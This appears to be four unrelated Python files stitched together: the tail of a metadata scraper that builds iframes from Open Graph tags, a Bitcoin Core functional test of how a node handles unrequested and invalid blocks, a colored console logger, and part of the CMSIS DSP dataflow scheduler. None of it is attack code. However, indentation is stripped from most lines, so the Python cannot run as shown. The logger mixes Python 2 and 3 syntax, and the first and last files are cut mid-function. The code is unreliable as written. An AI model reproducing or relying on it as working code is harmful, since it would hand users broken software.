requestResult = self.__get_request_content(link_to_scrap)
except Exception as e:
return {
"error": "cannot scrap the provided url",
"reason": e.args[0]
}
request_code = requestResult.getcode()
if request_code >= 200 and request_code <= 400:
page = requestResult.read()
soup = BeautifulSoup(page, DEFAULT_HTML_PARSER)
all_meta_tags = soup.find_all(META_TAG)
all_link_tags = soup.find_all(LINK_TAG, {"rel": "canonical"})
default_title = soup.find(TITLE)
for tag in all_meta_tags:
result = self.__verifyTagName(result, tag)
if TITLE not in result and default_title is not None:
result[TITLE] = default_title.contents[0]
result = self.__verifyTagOpenGraph(result, all_meta_tags)
for tag in all_link_tags:
href = tag.get(HREF_PROPERTY)
if href is not None:
if HTTP_PROTOCOL in href:
result[URL] = href
if URL not in result:
result[URL] = link_to_scrap
result[SOURCE] = urlparse(link_to_scrap).netloc
if IMAGE in result:
if result[IMAGE].find(HTTP_PROTOCOL) == -1:
result[IMAGE] = HTTP_PROTOCOL_NORMAL + result[SOURCE] + result[IMAGE]
return result
        except Exception as e:
            return {
                "error": "cannot scrape the provided url",
                "reason": e.args[0]
}
    def __get_request_content(self, link):
        try:
            return urlopen(link)
        except HTTPError as e:
            # HTTPError is a subclass of URLError, so it must be caught first
            raise Exception(
                "cannot make http request %s" % str(e.reason)
            )
        except URLError as e:
            raise Exception(
                "cannot get url content %s" % str(e.reason)
            )
def __verifyTagName(self, result, tag):
tag_content = tag.get(CONTENT)
tag_to_search = tag.get(NAME)
if tag_to_search is None:
tag_to_search = tag.get(PROPERTY)
if tag_to_search is None:
tag_to_search = tag.get(ITEMPROP)
if tag_to_search is not None and tag_content is not None:
if TITLE == tag_to_search.lower() and TITLE not in result:
result[TITLE] = tag_content
if DESCRIPTION == tag_to_search.lower() and DESCRIPTION not in result:
result[DESCRIPTION] = tag_content
if IMAGE == tag_to_search.lower() and IMAGE not in result:
result[IMAGE] = tag_content
return result
def __verifyTagOpenGraph(self, result, all_tags):
open_graph_objects = {}
searching_iter_name = first_sub_element = last_sub_element = last_element = None
for index, tag in enumerate(all_tags):
tag_content = tag.get(CONTENT)
tag_to_search = tag.get(PROPERTY)
if tag_to_search is None:
tag_to_search = tag.get(NAME)
if tag_to_search is None:
tag_to_search = tag.get(ITEMPROP)
if tag_to_search is not None:
if OG in tag_to_search:
first_iteration = tag_to_search.find(":")
second_iteration = tag_to_search.find(":", first_iteration + 1)
if second_iteration == -1:
tag_og_title = tag_to_search.find(TITLE, first_iteration)
if TITLE not in result and tag_og_title != -1 and tag_to_search is not None:
result[TITLE] = tag_content
tag_og_description = tag_to_search.find(DESCRIPTION, first_iteration)
if DESCRIPTION not in result and tag_og_description != -1 and tag_to_search is not None:
result[DESCRIPTION] = tag_content
tag_og_image = tag_to_search.find(IMAGE, first_iteration)
if IMAGE not in result and tag_og_image != -1 and tag_to_search is not None:
result[IMAGE] = tag_content
if tag_og_title != -1 or tag_og_description != -1 or tag_og_image != -1:
open_graph_objects[tag_to_search[first_iteration + 1:]] = tag_content
else:
iter_name = tag_to_search[first_iteration + 1:second_iteration]
if searching_iter_name is None:
searching_iter_name = iter_name
open_graph_objects[searching_iter_name] = []
if iter_name != searching_iter_name:
searching_iter_name = first_sub_element = last_element = last_sub_element = None
else:
sub_element = tag_to_search[second_iteration + 1:]
if first_sub_element is None:
first_sub_element = sub_element
actual_object = {}
actual_object[first_sub_element] = tag_content
elif first_sub_element == sub_element:
open_graph_objects[searching_iter_name].append(actual_object)
actual_object = {}
actual_object[first_sub_element] = tag_content
last_sub_element = last_element
last_element = None
else:
if last_element == last_sub_element and last_sub_element is not None and last_element is not None:
open_graph_objects[searching_iter_name].append(actual_object)
first_sub_element = sub_element
actual_object = {}
actual_object[first_sub_element] = tag_content
else:
last_element = sub_element
actual_object[sub_element] = tag_content
# check for youtube og video properties for embed iframe
if VIDEO in open_graph_objects:
for elem in open_graph_objects[VIDEO]:
if TYPE in elem:
if elem[TYPE] == DEFAULT_HTML5_VIDEO_EMBED:
if SECURE_URL in elem:
iframe = '<iframe src="%s"' % elem[SECURE_URL]
if HEIGHT in elem:
iframe = iframe + ' height="%s"' % elem[HEIGHT]
if WIDTH in elem:
iframe = iframe + ' width="%s"' % elem[WIDTH]
iframe = iframe + '></iframe>'
result["iframe"] = iframe
elif URL in elem:
iframe = "<iframe src=" + elem[URL]
if HEIGHT in elem:
iframe = iframe + ' height="%s"' % elem[HEIGHT]
if WIDTH in elem:
iframe = iframe + ' width="%s"' % elem[WIDTH]
iframe = iframe + '></iframe>'
result["iframe"] = iframe
return result
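# A minimal usage sketch (hypothetical URL; requires network access):
if __name__ == '__main__':
    scraper = SimpleScraper()
    data = scraper.get_scraped_data("example.com")
    print(dumps(data, indent=2))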
|
|
#!/usr/bin/env python3
# Copyright (c) 2015-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test processing of unrequested blocks.
Setup: two nodes, node0+node1, not connected to each other. Node1 will have
nMinimumChainWork set to 0x10, so it won't process low-work unrequested blocks.
We have one P2PInterface connection to node0 called test_node, and one to node1
called min_work_node.
The test:
1. Generate one block on each node, to leave IBD.
2. Mine a new block on each tip, and deliver to each node from node's peer.
The tip should advance for node0, but node1 should skip processing due to
nMinimumChainWork.
Node1 is unused in tests 3-7:
3. Mine a block that forks from the genesis block, and deliver to test_node.
Node0 should not process this block (just accept the header), because it
is unrequested and doesn't have more or equal work to the tip.
4a,b. Send another two blocks that build on the forking block.
Node0 should process the second block but be stuck on the shorter chain,
because it's missing an intermediate block.
4c. Send 288 more blocks on the longer chain (the number of blocks ahead
we currently store).
Node0 should process all but the last block (too far ahead in height).
5. Send a duplicate of the block in #3 to Node0.
Node0 should not process the block because it is unrequested, and stay on
the shorter chain.
6. Send Node0 an inv for the height 3 block produced in #4 above.
   Node0 should figure out that it is missing the height 2 block and send a
   getdata.
7. Send Node0 the missing block again.
Node0 should process and the tip should advance.
8. Create a fork which is invalid at a height longer than the current chain
(ie to which the node will try to reorg) but which has headers built on top
of the invalid block. Check that we get disconnected if we send more headers
on the chain the node now knows to be invalid.
9. Test Node1 is able to sync when connected to node0 (which should have sufficient
work on its chain).
"""
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import time
from test_framework.blocktools import create_block, create_coinbase, create_transaction
class AcceptBlockTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.extra_args = [[], ["-minimumchainwork=0x10"]]
def setup_network(self):
        # Node0 will be used to test behavior of processing unrequested
        # blocks from peers which are not whitelisted, while Node1 (started
        # with -minimumchainwork) will be used to test the interaction with
        # nMinimumChainWork.
self.setup_nodes()
def run_test(self):
# Setup the p2p connections and start up the network thread.
# test_node connects to node0 (not whitelisted)
test_node = self.nodes[0].add_p2p_connection(P2PInterface())
        # min_work_node connects to node1 (which has -minimumchainwork set)
min_work_node = self.nodes[1].add_p2p_connection(P2PInterface())
network_thread_start()
# Test logic begins here
test_node.wait_for_verack()
min_work_node.wait_for_verack()
# 1. Have nodes mine a block (leave IBD)
[ n.generate(1) for n in self.nodes ]
tips = [ int("0x" + n.getbestblockhash(), 0) for n in self.nodes ]
# 2. Send one block that builds on each tip.
# This should be accepted by node0
blocks_h2 = [] # the height 2 blocks on each node's chain
block_time = int(time.time()) + 1
for i in range(2):
blocks_h2.append(create_block(tips[i], create_coinbase(2), block_time))
blocks_h2[i].solve()
block_time += 1
test_node.send_message(msg_block(blocks_h2[0]))
min_work_node.send_message(msg_block(blocks_h2[1]))
for x in [test_node, min_work_node]:
x.sync_with_ping()
assert_equal(self.nodes[0].getblockcount(), 2)
assert_equal(self.nodes[1].getblockcount(), 1)
self.log.info("First height 2 block accepted by node0; correctly rejected by node1")
# 3. Send another block that builds on genesis.
block_h1f = create_block(int("0x" + self.nodes[0].getblockhash(0), 0), create_coinbase(1), block_time)
block_time += 1
block_h1f.solve()
test_node.send_message(msg_block(block_h1f))
test_node.sync_with_ping()
tip_entry_found = False
for x in self.nodes[0].getchaintips():
if x['hash'] == block_h1f.hash:
assert_equal(x['status'], "headers-only")
tip_entry_found = True
assert(tip_entry_found)
assert_raises_rpc_error(-1, "Block not found on disk", self.nodes[0].getblock, block_h1f.hash)
# 4. Send another two block that build on the fork.
block_h2f = create_block(block_h1f.sha256, create_coinbase(2), block_time)
block_time += 1
block_h2f.solve()
test_node.send_message(msg_block(block_h2f))
test_node.sync_with_ping()
# Since the earlier block was not processed by node, the new block
# can't be fully validated.
tip_entry_found = False
for x in self.nodes[0].getchaintips():
if x['hash'] == block_h2f.hash:
assert_equal(x['status'], "headers-only")
tip_entry_found = True
assert(tip_entry_found)
# But this block should be accepted by node since it has equal work.
self.nodes[0].getblock(block_h2f.hash)
self.log.info("Second height 2 block accepted, but not reorg'ed to")
# 4b. Now send another block that builds on the forking chain.
block_h3 = create_block(block_h2f.sha256, create_coinbase(3), block_h2f.nTime+1)
block_h3.solve()
test_node.send_message(msg_block(block_h3))
test_node.sync_with_ping()
# Since the earlier block was not processed by node, the new block
# can't be fully validated.
tip_entry_found = False
for x in self.nodes[0].getchaintips():
if x['hash'] == block_h3.hash:
assert_equal(x['status'], "headers-only")
tip_entry_found = True
assert(tip_entry_found)
        # But this block should be accepted by node since it has more work.
        self.nodes[0].getblock(block_h3.hash)
self.log.info("Unrequested more-work block accepted")
# 4c. Now mine 288 more blocks and deliver; all should be processed but
# the last (height-too-high) on node (as long as it is not missing any headers)
tip = block_h3
all_blocks = []
for i in range(288):
next_block = create_block(tip.sha256, create_coinbase(i + 4), tip.nTime+1)
next_block.solve()
all_blocks.append(next_block)
tip = next_block
# Now send the block at height 5 and check that it wasn't accepted (missing header)
test_node.send_message(msg_block(all_blocks[1]))
test_node.sync_with_ping()
assert_raises_rpc_error(-5, "Block not found", self.nodes[0].getblock, all_blocks[1].hash)
assert_raises_rpc_error(-5, "Block not found", self.nodes[0].getblockheader, all_blocks[1].hash)
# The block at height 5 should be accepted if we provide the missing header, though
headers_message = msg_headers()
headers_message.headers.append(CBlockHeader(all_blocks[0]))
test_node.send_message(headers_message)
test_node.send_message(msg_block(all_blocks[1]))
test_node.sync_with_ping()
self.nodes[0].getblock(all_blocks[1].hash)
# Now send the blocks in all_blocks
for i in range(288):
test_node.send_message(msg_block(all_blocks[i]))
test_node.sync_with_ping()
# Blocks 1-287 should be accepted, block 288 should be ignored because it's too far ahead
for x in all_blocks[:-1]:
self.nodes[0].getblock(x.hash)
assert_raises_rpc_error(-1, "Block not found on disk", self.nodes[0].getblock, all_blocks[-1].hash)
# 5. Test handling of unrequested block on the node that didn't process
# Should still not be processed (even though it has a child that has more
# work).
# The node should have requested the blocks at some point, so
# disconnect/reconnect first
self.nodes[0].disconnect_p2ps()
self.nodes[1].disconnect_p2ps()
network_thread_join()
test_node = self.nodes[0].add_p2p_connection(P2PInterface())
network_thread_start()
test_node.wait_for_verack()
test_node.send_message(msg_block(block_h1f))
test_node.sync_with_ping()
assert_equal(self.nodes[0].getblockcount(), 2)
self.log.info("Unrequested block that would complete more-work chain was ignored")
# 6. Try to get node to request the missing block.
# Poke the node with an inv for block at height 3 and see if that
# triggers a getdata on block 2 (it should if block 2 is missing).
with mininode_lock:
# Clear state so we can check the getdata request
test_node.last_message.pop("getdata", None)
test_node.send_message(msg_inv([CInv(2, block_h3.sha256)]))
test_node.sync_with_ping()
with mininode_lock:
getdata = test_node.last_message["getdata"]
# Check that the getdata includes the right block
assert_equal(getdata.inv[0].hash, block_h1f.sha256)
self.log.info("Inv at tip triggered getdata for unprocessed block")
# 7. Send the missing block for the third time (now it is requested)
test_node.send_message(msg_block(block_h1f))
test_node.sync_with_ping()
assert_equal(self.nodes[0].getblockcount(), 290)
self.nodes[0].getblock(all_blocks[286].hash)
assert_equal(self.nodes[0].getbestblockhash(), all_blocks[286].hash)
assert_raises_rpc_error(-1, "Block not found on disk", self.nodes[0].getblock, all_blocks[287].hash)
self.log.info("Successfully reorged to longer chain from non-whitelisted peer")
# 8. Create a chain which is invalid at a height longer than the
# current chain, but which has more blocks on top of that
block_289f = create_block(all_blocks[284].sha256, create_coinbase(289), all_blocks[284].nTime+1)
block_289f.solve()
block_290f = create_block(block_289f.sha256, create_coinbase(290), block_289f.nTime+1)
block_290f.solve()
block_291 = create_block(block_290f.sha256, create_coinbase(291), block_290f.nTime+1)
# block_291 spends a coinbase below maturity!
block_291.vtx.append(create_transaction(block_290f.vtx[0], 0, b"42", 1))
block_291.hashMerkleRoot = block_291.calc_merkle_root()
block_291.solve()
block_292 = create_block(block_291.sha256, create_coinbase(292), block_291.nTime+1)
block_292.solve()
# Now send all the headers on the chain and enough blocks to trigger reorg
headers_message = msg_headers()
headers_message.headers.append(CBlockHeader(block_289f))
headers_message.headers.append(CBlockHeader(block_290f))
headers_message.headers.append(CBlockHeader(block_291))
headers_message.headers.append(CBlockHeader(block_292))
test_node.send_message(headers_message)
test_node.sync_with_ping()
tip_entry_found = False
for x in self.nodes[0].getchaintips():
if x['hash'] == block_292.hash:
assert_equal(x['status'], "headers-only")
tip_entry_found = True
assert(tip_entry_found)
assert_raises_rpc_error(-1, "Block not found on disk", self.nodes[0].getblock, block_292.hash)
test_node.send_message(msg_block(block_289f))
test_node.send_message(msg_block(block_290f))
test_node.sync_with_ping()
self.nodes[0].getblock(block_289f.hash)
self.nodes[0].getblock(block_290f.hash)
test_node.send_message(msg_block(block_291))
# At this point we've sent an obviously-bogus block, wait for full processing
# without assuming whether we will be disconnected or not
try:
# Only wait a short while so the test doesn't take forever if we do get
# disconnected
test_node.sync_with_ping(timeout=1)
except AssertionError:
test_node.wait_for_disconnect()
self.nodes[0].disconnect_p2ps()
test_node = self.nodes[0].add_p2p_connection(P2PInterface())
network_thread_start()
test_node.wait_for_verack()
# We should have failed reorg and switched back to 290 (but have block 291)
assert_equal(self.nodes[0].getblockcount(), 290)
assert_equal(self.nodes[0].getbestblockhash(), all_blocks[286].hash)
assert_equal(self.nodes[0].getblock(block_291.hash)["confirmations"], -1)
# Now send a new header on the invalid chain, indicating we're forked off, and expect to get disconnected
block_293 = create_block(block_292.sha256, create_coinbase(293), block_292.nTime+1)
block_293.solve()
headers_message = msg_headers()
headers_message.headers.append(CBlockHeader(block_293))
test_node.send_message(headers_message)
test_node.wait_for_disconnect()
# 9. Connect node1 to node0 and ensure it is able to sync
connect_nodes(self.nodes[0], 1)
sync_blocks([self.nodes[0], self.nodes[1]])
self.log.info("Successfully synced nodes 1 and 0")
if __name__ == '__main__':
AcceptBlockTest().main()
|
|
import os
import sys
import logging
__all__ = ['logger']
try:
from colorama import init, Fore, Style
init(autoreset=False)
colors = {
'good' : Fore.GREEN,
'bad' : Fore.RED,
'vgood' : Fore.GREEN + Style.BRIGHT,
'vbad' : Fore.RED + Style.BRIGHT,
'std' : '', # Do not color "standard" text
'warn' : Fore.YELLOW + Style.BRIGHT,
'reset' : Style.RESET_ALL,
}
except ImportError:
colors = {
'good' : '',
'bad' : '',
'vgood' : '',
'vbad' : '',
'std' : '',
'warn' : '',
'reset' : '',
}
def get_console_width():
"""
Return width of available window area. Autodetection works for
    Windows and POSIX platforms. Returns 80 for other platforms.
Code from http://bitbucket.org/techtonik/python-wget
"""
if os.name == 'nt':
STD_INPUT_HANDLE = -10
STD_OUTPUT_HANDLE = -11
STD_ERROR_HANDLE = -12
# get console handle
from ctypes import windll, Structure, byref
try:
from ctypes.wintypes import SHORT, WORD, DWORD
except ImportError:
# workaround for missing types in Python 2.5
from ctypes import (
c_short as SHORT, c_ushort as WORD, c_ulong as DWORD)
console_handle = windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
# CONSOLE_SCREEN_BUFFER_INFO Structure
class COORD(Structure):
_fields_ = [("X", SHORT), ("Y", SHORT)]
class SMALL_RECT(Structure):
_fields_ = [("Left", SHORT), ("Top", SHORT),
("Right", SHORT), ("Bottom", SHORT)]
class CONSOLE_SCREEN_BUFFER_INFO(Structure):
_fields_ = [("dwSize", COORD),
("dwCursorPosition", COORD),
("wAttributes", WORD),
("srWindow", SMALL_RECT),
("dwMaximumWindowSize", DWORD)]
sbi = CONSOLE_SCREEN_BUFFER_INFO()
ret = windll.kernel32.GetConsoleScreenBufferInfo(console_handle, byref(sbi))
if ret == 0:
return 0
return sbi.srWindow.Right+1
elif os.name == 'posix':
from fcntl import ioctl
from termios import TIOCGWINSZ
from array import array
winsize = array("H", [0] * 4)
try:
ioctl(sys.stdout.fileno(), TIOCGWINSZ, winsize)
except IOError:
pass
        return winsize[1]  # number of columns
return 80
class Logger(object):
VERBOSE = logging.DEBUG - 1
DEBUG = logging.DEBUG
INFO = logging.INFO
WARN = logging.WARNING
ERROR = logging.ERROR
FATAL = logging.FATAL
## This attribute is set to True when the user does not want colors
## by __init__.py
_NO_COLORS = False
def __init__(self,level=None):
self.indent = 0
self.level = level or Logger.INFO
self._stack = ['']
self.enabled = True
def disable_colors(self):
self._NO_COLORS = True
for k in colors.keys():
colors[k] = ''
def newline(self):
'''Print a newline character (\n) on Standard Output.'''
sys.stdout.write('\n')
def raise_last(self, exc):
raise exc(self.last_msg)
@property
def last_msg(self):
return self._stack[-1]
    def ask(self, message=None, bool=None, choices=None, dont_ask=False):
        if bool is not None:
            if bool in (True, False) or (isinstance(bool, (list, tuple)) and len(bool) == 1):
                if bool == False:
                    txt = "Cancel"
                elif bool == True:
                    txt = "OK"
                else:
                    txt = bool[0]
                self.log(self.INFO, 'std', "%s, %s..."%(message, txt), addn=False)
                if not dont_ask:
                    input()
                return
            else:
                if dont_ask:
                    self.log(self.INFO, 'std', '%s ? Yes'%message)
                    return True
                while True:
                    self.log(self.INFO, 'std', "yes: "+bool[0])
                    self.log(self.INFO, 'std', "no: "+bool[1])
                    try:
                        self.log(self.INFO, 'std', '%s ? (y/[n]) '%message, addn=False)
                        ans = input()
                    except Exception:
                        continue
                    # default choice : no
                    if not ans.strip():
                        return False
                    if ans not in 'yYnN':
                        continue
                    return ans in 'yY'
        if choices:
            if isinstance(choices, dict):
                _data = choices
                choices = list(choices.keys())
            else:
                _data = None
            self.log(self.INFO, 'std', message)
            for n, choice in enumerate(choices):
                self.log(self.INFO, 'std', "%2d - %s"%(n+1, choice))
            while True:
                try:
                    ans = int(input('Your choice ? '))
                except Exception:
                    self.log(self.INFO, 'std', "Please enter the selected option's number.")
                    continue
                if ans < 1 or ans > len(choices):
                    continue
                break
            idx = choices[ans-1]
            return (_data[idx] if _data else idx)
def verbose(self, msg, *a, **kw):
self.log(self.VERBOSE, 'std', msg, *a, **kw)
def debug(self, msg, *a, **kw):
self.log(self.DEBUG, 'std', msg, *a, **kw)
def info(self, msg, *a, **kw):
self.log(self.INFO, 'std', msg, *a, **kw)
def success(self, msg, *a, **kw):
self.log(self.INFO, 'good', msg, *a, **kw)
def warn(self, msg, *a, **kw):
self.log(self.WARN, 'warn', msg, *a, **kw)
def error(self, msg, *a, **kw):
self.log(self.ERROR, 'bad', msg, *a, **kw)
exc = kw.get('exc', None)
if exc is not None:
raise exc(self.last_msg)
def fatal(self, msg, *a, **kw):
self.log(self.FATAL, 'vbad', msg, *a, **kw)
exc = kw.get('exc', None)
if exc is not None:
raise exc(self.last_msg)
def exit(self, msg=None, status=1):
if msg != None:
self.log(self.FATAL, 'vbad', msg)
sys.exit(status)
def log(self, level, col, msg, *a, **kw):
'''
This is the base function that logs all messages. This function prints a newline character too,
unless you specify ``addn=False``. When the message starts with a return character (\r) it automatically
cleans the line.
'''
if level >= self.level and self.enabled:
std = sys.stdout
if level >= self.ERROR:
std = sys.stderr
## We can pass to logger.log any object: it must have at least
## a __repr__ or a __str__ method.
msg = str(msg)
if msg.startswith('\r') or self.last_msg.startswith('\r'):
## We have to clear the line in case this message is longer than
## the previous
std.write('\r' + ' ' * get_console_width())
msg = '\r' + ' ' * self.indent + msg.lstrip('\r').format(*a)
else:
try:
msg = ' ' * self.indent + msg.format(*a)
except KeyError:
msg = ' ' * self.indent + msg
col, col_reset = colors[col], colors['reset']
if self._NO_COLORS:
col, col_reset = '', ''
std.write(col + msg + col_reset)
## Automatically adds a newline character
if kw.get('addn', True):
self.newline()
## flush() makes the log immediately readable
std.flush()
self._stack.append(msg)
logger = Logger()
if __name__ == '__main__':
print logger.ask("Beware, you enter a secret place", bool=True)
print logger.ask("Sorry, can't install this package", bool=False)
print logger.ask("Sorry, can't install this package", bool=['Press any key to continue'])
print logger.ask('Proceed', bool=('remove files', 'cancel'))
print logger.ask('Do you want to upgrade', bool=('upgrade version', 'keep working version'))
print logger.ask('Installation method', choices=('Egg based', 'Flat directory'))
print logger.ask('some dict', choices={'choice a': 'a', 'choice b': 'b', 'choice c': 'c'})
|
|
###########################################
# Project: CMSIS DSP Library
# Title: description.py
# Description: Schedule generation
#
# $Date: 29 July 2021
# $Revision: V1.10.0
#
# Target Processor: Cortex-M and Cortex-A cores
# -------------------------------------------------------------------- */
#
# Copyright (C) 2010-2021 ARM Limited or its affiliates. All rights reserved.
#
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the License); you may
# not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an AS IS BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
############################################
"""Description of the graph"""
import networkx as nx
import numpy as np
from sympy import Matrix
from sympy.core.numbers import ilcm,igcd
import cmsisdsp.sdf.scheduler.graphviz
import cmsisdsp.sdf.scheduler.ccode
import cmsisdsp.sdf.scheduler.pythoncode
from .node import *
from .config import *
from ..types import *
# To debug graph coloring for memory optimization
#import matplotlib.pyplot as plt
class IncompatibleIO(Exception):
pass
class GraphIsNotConnected(Exception):
pass
class NotSchedulableError(Exception):
pass
class DeadlockError(Exception):
pass
class CannotDelayConstantError(Exception):
pass
class FifoBuffer:
"""Buffer used by a FIFO"""
def __init__(self,bufferID,theType,length):
self._length=length
self._theType=theType
self._bufferID=bufferID
class FIFODesc:
"""A FIFO connecting two nodes"""
def __init__(self,fifoid):
# The FIFO is in fact just an array
self.isArray=False
# FIFO length
self.length=0
# FIFO type
self.theType=None
# Buffer used by FIFO
self.buffer=None
# Used for plot in graphviz
self.bufferID=-1
self._fifoID=fifoid
# Source IO
self.src = None
# Dest IO
self.dst = None
# FIFO delay
self.delay=0
        # Used for liveness analysis
# To share buffers between FIFO in memory optimization
# mode, we need to know when a FIFO is in use.
# We compute the maximum extent : so the biggest interval
# and not a disconnected union of intervals
# This could be improved. We could use
# a disjoint union of intervals but they should be mapped
# to the same node in the interference graph
self._liveInterval=(-1,-1)
# shared buffer number not yet allocated
self.sharedNB=-1
# For c code generation
@property
def isArrayAsInt(self):
if self.isArray:
return(1)
else:
return(0)
@property
def hasDelay(self):
return(self.delay>0)
def dump(self):
print("array %d len %d %s id %d src %s:%s dst %s:%s " %
(self.isArray,
self.length,
self.theType.ctype,
self.fifoID,
self.src.owner.nodeID,
self.src.name,
self.dst.owner.nodeID,
self.dst.name))
@property
def fifoID(self):
return self._fifoID
def recordWrite(self,theTime):
start,stop=self._liveInterval
if start==-1:
self._liveInterval=(theTime,stop)
def recordRead(self,theTime):
start,stop=self._liveInterval
if (theTime > stop):
self._liveInterval=(start,theTime)
def analyzeStep(vec,allFIFOs,theTime):
"""Analyze an evolution step to know which FIFOs are read and written to"""
fifoID = 0
for fifo in (vec > 0):
if fifo:
allFIFOs[fifoID].recordWrite(theTime)
fifoID = fifoID + 1
fifoID = 0
for fifo in (vec < 0):
if fifo:
allFIFOs[fifoID].recordRead(theTime)
fifoID = fifoID + 1
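# Example (illustrative): if the evolution step vector is [3, -2, 0] at
# scheduling time 5, FIFO 0 records a write and FIFO 1 records a read at
# time 5, while FIFO 2 is left untouched.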
class Graph():
def __init__(self):
self._nodes={}
self._edges={}
self._delays={}
self._constantEdges={}
self._g = nx.Graph()
self._sortedNodes=None
self._totalMemory=0
self._allFIFOs = None
self._allBuffers = None
def connect(self,nodea,nodeb):
# When connecting to a constant node we do nothing
# since there is no FIFO in this case
        # and it does not participate in the scheduling.
if (isinstance(nodea,Constant)):
nodeb.constantNode = nodea
self._constantEdges[(nodea,nodeb)]=True
else:
if nodea.compatible(nodeb):
self._sortedNodes = None
self._sortedEdges = None
self._g.add_edge(nodea.owner,nodeb.owner)
nodea.fifo = (nodea,nodeb)
nodeb.fifo = (nodea,nodeb)
self._edges[(nodea,nodeb)]=True
if not (nodea.owner in self._nodes):
self._nodes[nodea.owner]=True
if not (nodeb.owner in self._nodes):
self._nodes[nodeb.owner]=True
else:
raise IncompatibleIO
def connectWithDelay(self,nodea,nodeb,delay):
# We cannot connect with delay to a constant node
if (isinstance(nodea,Constant)):
raise CannotDelayConstantError
else:
self.connect(nodea,nodeb)
self._delays[(nodea,nodeb)] = delay
def __str__(self):
res=""
for (a,b) in self._edges:
nodea = a.owner
nodeb = b.owner
res += ("%s.%s -> %s.%s\n" % (nodea.nodeID,a.name, nodeb.nodeID,b.name))
return(res)
def initializeFIFODescriptions(self,config,allFIFOs, fifoLengths,maxTime):
"""Initialize FIFOs datastructure"""
for fifo in allFIFOs:
edge = self._sortedEdges[fifo.fifoID]
fifo.length = fifoLengths[fifo.fifoID]
src,dst = edge
fifo.src=src
fifo.dst=dst
fifo.delay=self.getDelay(edge)
# When a FIFO is working as an array then its buffer may
            # potentially be shared with other FIFOs working as arrays
if src.nbSamples == dst.nbSamples:
if fifo.delay==0:
fifo.isArray = True
fifo.theType = src.theType
#fifo.dump()
bufferID=0
allBuffers=[]
        # Compute a graph describing when FIFOs are used at the same time.
        # Then use graph coloring to allocate a buffer to those FIFOs,
        # and size each buffer based on the longest FIFO using it.
if config.memoryOptimization:
G = nx.Graph()
for fifo in allFIFOs:
if fifo.isArray:
G.add_node(fifo)
# Create the interference graph
# Dictionary of active FIFOs at a given time.
# The time is a scheduling step
active={}
currentTime=0
while currentTime<=maxTime:
                # Remove FIFOs that are no longer active:
                # their stop time is < currentTime
toDelete=[]
for k in active:
start,stop=k._liveInterval
if stop<currentTime:
toDelete.append(k)
for k in toDelete:
del active[k]
# Check FIFOs becoming active.
# They are added to the active list
                # and an interference edge is added between this FIFO
                # and all the FIFOs active at the same time.
for fifo in allFIFOs:
if fifo.isArray:
start,stop=fifo._liveInterval
                        # For src -> node -> dst:
                        # at time t, the node reads from src, so the stop
                        # time of src is the current time t, and it writes
                        # to dst, so the start time of dst is also the
                        # current time. src and dst are therefore both live
                        # at this time, which means the condition on the
                        # stop time must be stop >= currentTime and not a
                        # strict comparison
if start<=currentTime and stop >= currentTime:
if not (fifo in active):
for k in active:
G.add_edge(k,fifo)
active[fifo]=True
currentTime = currentTime + 1
# To debug and display the graph
if False:
labels={}
for n in G.nodes:
labels[n]="%s -> %s" % (n.src.owner.nodeName,n.dst.owner.nodeName)
pos = nx.spring_layout(G, seed=3113794652)
subax1 = plt.subplot(121)
nx.draw_networkx_edges(G, pos, width=1.0, alpha=0.5)
nx.draw_networkx_labels(G, pos, labels, font_size=10)
plt.show()
quit()
# Graph coloring
d = nx.coloring.greedy_color(G, strategy="largest_first")
# Allocate the colors (buffer ID) to the FIFO
# and keep track of the max color number
# Since other buffers (for real FIFOs) will have their
# numbering start after this one.
for fifo in d:
fifo.sharedNB=d[fifo]
bufferID=max(bufferID,fifo.sharedNB)
# Compute the max size for each shared buffer
maxSizes={}
for fifo in d:
lengthInBytes = fifo.theType.bytes * fifo.length
if fifo.sharedNB in maxSizes:
maxSizes[fifo.sharedNB] = max(maxSizes[fifo.sharedNB],lengthInBytes)
else:
maxSizes[fifo.sharedNB]=lengthInBytes
# Create the buffers
for theID in maxSizes:
sharedA = FifoBuffer(theID,CType(UINT8),maxSizes[theID])
allBuffers.append(sharedA)
for fifo in allFIFOs:
# Use shared buffer if memory optimization
if fifo.isArray and config.memoryOptimization:
fifo.buffer=allBuffers[fifo.sharedNB]
fifo.bufferID=fifo.sharedNB
# Create a new buffer for a real FIFO
# Use bufferID which is starting after the numbers allocated
# to shared buffers
else:
buf = FifoBuffer(bufferID,fifo.theType,fifo.length)
allBuffers.append(buf)
fifo.buffer=buf
fifo.bufferID = bufferID
bufferID = bufferID + 1
# Compute the total memory used in bytes
self._totalMemory = 0
for buf in allBuffers:
self._totalMemory = self._totalMemory + buf._theType.bytes * buf._length
#for fifo in allFIFOs:
# fifo.dump()
return(allBuffers)
@property
def constantEdges(self):
return list(self._constantEdges.keys())
@property
def nodes(self):
return list(self._nodes.keys())
@property
def edges(self):
return list(self._edges.keys())
def hasDelay(self,edge):
return(edge in self._delays)
def getDelay(self,edge):
if self.hasDelay(edge):
return(self._delays[edge])
else:
return(0)
def checkGraph(self):
if not nx.is_connected(self._g):
raise GraphIsNotConnected
def topologyMatrix(self):
self.checkGraph()
rows=[]
# This is used in schedule generation
# and all functions must use the same node ordering
self._sortedNodes = sorted(self.nodes, key=lambda x: x.nodeID)
# Arbitrary order but used for now
self._sortedEdges = self.edges.copy()
#for x in self._sorted:
# print(x.nodeID)
for edge in self._sortedEdges:
na,nb = edge
currentRow=[0] * len(self._sortedNodes)
ia=self._sortedNodes.index(na.owner)
ib=self._sortedNodes.index(nb.owner)
# Produced by na on the edge
currentRow[ia] = na.nbSamples
# Consumed by nb on the edge
currentRow[ib] = -nb.nbSamples
rows.append(currentRow)
return(np.array(rows))
def nullVector(self):
m = self.topologyMatrix()
r=Matrix(m).nullspace()
if len(r) != 1:
raise NotSchedulableError
result=list(r[0])
denominators = [x.q for x in result]
# Remove denominators
ppcm = ilcm(*denominators)
#print(ppcm)
